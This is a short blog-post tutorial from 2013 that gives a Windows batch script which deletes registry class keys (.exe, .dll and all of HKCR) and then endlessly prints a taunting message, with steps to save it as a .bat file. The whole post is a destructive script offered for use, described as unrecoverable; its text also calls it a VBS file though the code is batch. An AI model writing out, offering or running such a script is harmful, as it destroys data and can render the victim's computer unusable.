Saturday 4 May 2013

Tutorial Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT YOUR OWN RISK]

What will this VBS file do ?

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).


Method :


1. Open Notepad and copy the code given below

 
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

2. Save as "Anything.bat" (Without quotes & .bat is must)

0 comments:

Post a Comment